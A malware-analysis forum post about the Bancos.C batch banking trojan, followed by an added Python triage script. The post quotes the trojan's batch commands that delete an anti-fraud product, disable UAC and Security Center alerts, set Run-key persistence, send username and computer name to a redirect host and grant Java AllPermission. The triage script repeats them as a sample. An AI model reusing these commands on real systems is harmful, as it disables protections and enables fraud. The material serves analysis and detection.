#14617 by rkhunter, Fri Jul 13, 2012 12:21 pm
Trojan:BAT/Bancos.C

SHA1: 6ad1feb9c700166dfc95f26ce6ca56633f9b7afc
MD5: bf3d246f192438279bec871feb4966d0


Packed under RarSFX + UPX.
The main payload is a .bat script with obfuscated strings (in the .rsrc section of the unpacked file).

Removes files:
del /f /q "%windir%\system32\scpVista.exe"
del /f /q "%windir%\system32\scpLIB.dll"
del /f /q "%windir%\system32\scpMIB.dll"
del /f /q "%windir%\system32\scpsssh2.dll"
del /f /q "%ProgramFiles%\Scpad\scpLIB.dll"
del /f /q "%ProgramFiles%\Scpad\scpMIB.dll"
del /f /q "%ProgramFiles%\Scpad\scpsssh2.dll"
del /f /q "%ProgramFiles%\Scpad\scpIBCfg.bin"
By googling I found that these files belong to an anti-malware/anti-fraud product of the Brazilian company Scopus Tecnologia.

Some strings:
Overwrite?
Please enter the password.
Bitte wählen Sie einen Ordner zum Speichern der Dateien aus.
Fehler!
An unknown error occured. The program will be terminated.
\BDFINOPS
Error!
This program is not supported on this operating system.
open
Überschreiben?
Fortfahren?
Continue?
The file
Einige Include Dateien konnten nicht erstellt werden.
Nicht genügend Speicher verfügbar.
Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet.
Can not create some of your include files.
Password
Passwort
Falsches Passwort.
Can not allocate the memory.
existiert bereits im aktuellen Arbeitsverzeichnis.
Überschreiben?
Das Programm wird von diesem Betriebssytem nicht unterstützt.
Choose a location to save the files.
Wrong password.
Die Datei
Bitte geben Sie das Passwort ein.
deutsch
already exists in the current directory. Overwrite?
It can also run IE and redirect the user to a special host:
start /low /min iexplore.exe "http://!_a_!/agoravai.php?a=%username%&b=%computername%")&&fsutil file createnew "%temp%\thunb.db" 666"
The deobfuscated string looks like this:
http://redir.updateflashplayer.com.br/a ... mputername%"
Disables Security Center:
%windir%\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
%windir%\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Microsoft Installer" /t REG_SZ /d "%temp%\_msimsn.exe" /f
%windir%\system32\reg.exe add "HKLM\Software\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d 0x00000001 /f
%windir%\system32\reg.exe add "HKLM\Software\Microsoft\Security Center" /v FirewallDisableNotify /t REG_DWORD /d 0x00000001 /f
%windir%\system32\reg.exe add "HKLM\Software\Microsoft\Security Center" /v UpdatesDisableNotify /t REG_DWORD /d 0x00000001 /f
%windir%\system32\reg.exe add "HAheAEa_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v DisableSR /t REG_DWORD /d 0x00000001 /f
VMware detection code:
REM @ipconfig /all|find "VMware"&&if errorlevel 0 exit
Makes some Java-related settings:
set java=permission java.security.AllPermission
for /f "tokens=*" %%E IN ('dir /b /s ^| find /i "java.policy"') DO echo grant { %java%;}; > "%%E"
...and of course, epic detection:
dropper: 27/42 https://www.virustotal.com/file/23a65ea ... /analysis/
unpacked: 10/40 https://www.virustotal.com/file/6cbb3a2 ... 342175161/
malicious batch script: 4/41 https://www.virustotal.com/file/47d9eb5 ... 342174705/
Attachments (password: infected): three archives, 1.61 KiB, 20.22 KiB and 75.32 KiB.
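A small static-triage script for batch droppers of this kind, added here as an example and not part of rkhunter's post. It tokenizes each line the way cmd.exe roughly does (a quoted string is one word), expands variables the script itself defines with `set` (so the `%java%` indirection above becomes visible), and flags the behaviours the post shows: `reg.exe add` writes to the UAC policy key, the Security Center notify values and the Run key, `del` of files under system directories, the REM'd-out VMware check, the browser launch with a URL, and the java.policy overwrite with AllPermission. `SAMPLE_BAT` is constructed from the fragments quoted in the post (the truncated hostname and the obfuscated hive name are left exactly as quoted); the list of sensitive keys and the finding descriptions are this example's own choices.

```python
"""Static triage of a Windows batch dropper.  Added example, not code from the
forum post; SAMPLE_BAT is constructed from the fragments quoted there."""
import re

# Registry paths (below the hive, lower-case) whose modification by a dropper
# is worth a finding.  The list and descriptions are this example's choices.
SENSITIVE_KEYS = {
    r"software\microsoft\security center": "Security Center",
    r"software\microsoft\windows\currentversion\policies\system": "logon/UAC policy",
    r"software\microsoft\windows\currentversion\run": "Run-key persistence",
    r"software\microsoft\windows\currentversion\internet settings": "Internet Settings",
}
HIVES = {"hklm": "HKLM", "hkey_local_machine": "HKLM",
         "hkcu": "HKCU", "hkey_current_user": "HKCU"}
SYSTEM_DIRS = ("%windir%", "%systemroot%", "%programfiles%")
ZERO = ("0", "0x0", "0x00000000")
TOKEN_RE = re.compile(r'"[^"]*"|\S+')

# Constructed from the fragments quoted in the post; the hostname and the
# odd hive name are left exactly as obfuscated/truncated there.
SAMPLE_BAT = r"""
@echo off
del /f /q "%windir%\system32\scpVista.exe"
del /f /q "%ProgramFiles%\Scpad\scpIBCfg.bin"
REM @ipconfig /all|find "VMware"&&if errorlevel 0 exit
%windir%\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
%windir%\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Microsoft Installer" /t REG_SZ /d "%temp%\_msimsn.exe" /f
%windir%\system32\reg.exe add "HKLM\Software\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d 0x00000001 /f
%windir%\system32\reg.exe add "HAheAEa_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v DisableSR /t REG_DWORD /d 0x00000001 /f
start /low /min iexplore.exe "http://!_a_!/agoravai.php?a=%username%&b=%computername%"
set java=permission java.security.AllPermission
for /f "tokens=*" %%E IN ('dir /b /s ^| find /i "java.policy"') DO echo grant { %java%;}; > "%%E"
"""


def tokenize(line):
    """Split a cmd line into words: a "quoted string" is one word, quotes removed."""
    return [t.strip('"') for t in TOKEN_RE.findall(line)]


def expand_script_vars(lines):
    """Expand %NAME% only for variables the script defines itself with `set`;
    host variables such as %windir% are left alone for the analyst to see."""
    env, out = {}, []
    for line in lines:
        m = re.match(r"\s*@?set\s+([^=\s]+)=(.*)$", line, re.I)
        if m:
            env[m.group(1).lower()] = m.group(2)
        for name, val in env.items():
            line = re.sub("%" + re.escape(name) + "%", lambda _m: val, line, flags=re.I)
        out.append(line)
    return out


def parse_reg_add(tokens):
    """Return a dict describing a `reg add` command, or None if this is not one."""
    exe = tokens[0].lower().rsplit("\\", 1)[-1] if tokens else ""
    if len(tokens) < 3 or exe not in ("reg", "reg.exe") or tokens[1].lower() != "add":
        return None
    hive, _, path = tokens[2].partition("\\")
    opts = {}
    for i in range(3, len(tokens) - 1):
        if tokens[i].lower() in ("/v", "/t", "/d"):
            opts[tokens[i].lower()] = tokens[i + 1]
    return {"hive": HIVES.get(hive.lower()), "hive_raw": hive, "path": path,
            "name": opts.get("/v") or "", "data": opts.get("/d")}


def triage(script):
    """Return (kind, description, line) findings for the text of a batch script."""
    findings = []
    for raw in expand_script_vars(script.splitlines()):
        line = raw.strip()
        low = line.lower()
        if not line:
            continue
        if low.split()[0].lstrip("@") == "rem":
            if "vmware" in low:
                findings.append(("vm", "VMware check present but commented out (REM)", line))
            continue
        toks = tokenize(line)
        cmd = toks[0].lower().rsplit("\\", 1)[-1]
        reg = parse_reg_add(toks)
        if reg:
            what = SENSITIVE_KEYS.get(reg["path"].lower())
            if reg["hive"] is None:
                findings.append(("reg", "unrecognized hive %r (possibly obfuscated)" % reg["hive_raw"], line))
            if reg["name"].lower() == "enablelua" and reg["data"] in ZERO:
                findings.append(("reg", "UAC disabled (EnableLUA=0)", line))
            elif reg["name"].lower().endswith("disablenotify") and reg["data"] not in ZERO:
                findings.append(("reg", "Security Center alert suppressed: " + reg["name"], line))
            elif what == "Run-key persistence":
                findings.append(("reg", "Run-key persistence: %s = %s" % (reg["name"], reg["data"]), line))
            elif what:
                findings.append(("reg", what + " modified", line))
        elif cmd == "del":
            for target in toks[1:]:
                if target.lower().startswith(SYSTEM_DIRS):
                    findings.append(("del", "deletes " + target, line))
        elif cmd == "start":
            for t in toks[1:]:
                if t.lower().startswith("http"):
                    findings.append(("net", "launches browser to " + t, line))
        if "java.policy" in low and "allpermission" in low:
            findings.append(("java", "java.policy overwritten with AllPermission", line))
    return findings


if __name__ == "__main__":
    for kind, desc, line in triage(SAMPLE_BAT):
        print("[%-4s] %s\n        %s" % (kind, desc, line))
```

Run as-is it prints ten findings for the constructed sample; point `triage()` at the text of a real unpacked script instead of `SAMPLE_BAT` to use it on a sample. The variable expansion step is what makes the java.policy finding fire, since the `AllPermission` text only appears behind `%java%`; the unrecognized-hive finding is deliberately kept separate, because a hive name that is not one of the known ones is itself a sign of string obfuscation worth a look.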